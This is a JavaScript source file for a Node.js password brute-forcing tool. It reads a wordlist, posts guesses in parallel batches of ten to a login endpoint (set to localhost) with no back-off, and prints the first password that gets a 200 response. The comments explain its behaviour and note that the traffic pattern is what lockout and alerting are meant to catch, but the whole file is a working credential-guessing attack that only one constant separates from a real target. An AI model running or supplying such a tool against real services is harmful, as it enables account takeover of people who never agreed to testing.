import fs from "fs";
import readline from "readline";
// Login endpoint the script posts to. It is fixed to localhost, so requests
// go to a service on the same machine.
const TARGET_URL = "http://localhost:3000/login";

// Number of login requests issued in parallel per batch.
const CONCURRENCY = 10;

// Optional CLI arguments: <username> <wordlist path>. A missing argument
// falls back to the default below.
const [usernameArg, wordlistArg] = process.argv.slice(2);
const username = usernameArg ?? "alice";
const wordlistPath = wordlistArg ?? "/usr/share/wordlists/rockyou-50.txt";
/**
 * Posts one username/password pair to TARGET_URL as JSON.
 *
 * Only the HTTP status is inspected: exactly 200 counts as a successful
 * login, and every other status (redirects, 401, 429, 5xx, ...) counts as a
 * failed guess. The response body is never read. A rejected fetch (for
 * example a refused connection) is not caught here and propagates to the
 * caller.
 *
 * @param {string} password - Candidate password to submit.
 * @returns {Promise<{password: string, success: boolean}>} The candidate and
 *   whether the server answered 200.
 */
async function tryPassword(password) {
  const payload = JSON.stringify({ username, password });
  const response = await fetch(TARGET_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: payload,
  });
  const success = response.status === 200;
  return { password, success };
}
/**
 * Submits every password in the batch concurrently and waits for all of them.
 *
 * Promise.all rejects as soon as any single request rejects, so one network
 * error fails the whole batch.
 *
 * @param {string[]} passwords - Candidates to try in parallel.
 * @returns {Promise<Array<{password: string, success: boolean}>>} Results in
 *   the same order as the input.
 */
async function runChunk(passwords) {
  const pending = passwords.map((candidate) => tryPassword(candidate));
  return Promise.all(pending);
}
/**
 * Streams the wordlist line by line and submits the candidates to the login
 * endpoint in batches of CONCURRENCY, exiting the process with status 0 on
 * the first batch that contains a 200 response.
 *
 * There is no delay or back-off between batches, so the request rate is
 * bounded only by CONCURRENCY and server latency. Seen from the server, this
 * is a run of bursts of up to CONCURRENCY POSTs to the login route for one
 * username: the pattern that per-account throttling, lockout, or
 * failed-login alerting is meant to catch.
 *
 * Note that the success message printed from the main loop and the one
 * printed from the final partial batch use different formats.
 *
 * @returns {Promise<void>} Resolves after the "not found" message if no
 *   candidate succeeded. On success the process exits instead.
 */
async function bruteForce() {
  console.log(`🎯 Target : ${TARGET_URL}`);
  console.log(`👤 Username: ${username}`);
  console.log(`📖 Wordlist: ${wordlistPath}\n`);

  // latin1 maps every byte to one character, so wordlists containing
  // non-UTF-8 bytes still decode line by line without errors.
  const wordlistStream = fs.createReadStream(wordlistPath, {
    encoding: "latin1",
  });
  const lines = readline.createInterface({
    input: wordlistStream,
    crlfDelay: Infinity,
  });

  let tried = 0;
  let batch = [];
  const startedAt = Date.now();

  for await (const rawLine of lines) {
    const candidate = rawLine.trim();
    if (candidate.length === 0) continue; // skip blank lines

    batch.push(candidate);
    if (batch.length < CONCURRENCY) continue; // keep filling the batch

    const outcomes = await runChunk(batch);
    tried += outcomes.length;

    // Only the first success in batch order is reported.
    const hit = outcomes.find(({ success }) => success);
    if (hit) {
      const elapsedMs = Date.now() - startedAt;
      const elapsed = (elapsedMs / 1000).toFixed(1);
      console.log(
        `\n✅ PASSWORD FOUND after ${tried} attempts (${elapsed}s)`,
      );
      console.log(` Username : ${username}`);
      console.log(` Password : ${hit.password}`);
      process.exit(0);
    }

    process.stdout.write(`\r⏳ Tried ${tried} passwords...`);
    batch = [];
  }

  // The wordlist ended with a partial batch: submit what is left.
  if (batch.length > 0) {
    const outcomes = await runChunk(batch);
    tried += outcomes.length;

    const hit = outcomes.find(({ success }) => success);
    if (hit) {
      console.log(
        `\n✅ PASSWORD FOUND: ${hit.password} (after ${tried} attempts)`,
      );
      process.exit(0);
    }
  }

  console.log(`\n❌ Password not found after ${tried} attempts.`);
}
// Entry point: run the attempt loop and print any rejection (unreadable
// wordlist, refused connection, ...) instead of leaving it unhandled.
bruteForce().catch((err) => {
  console.error(err);
});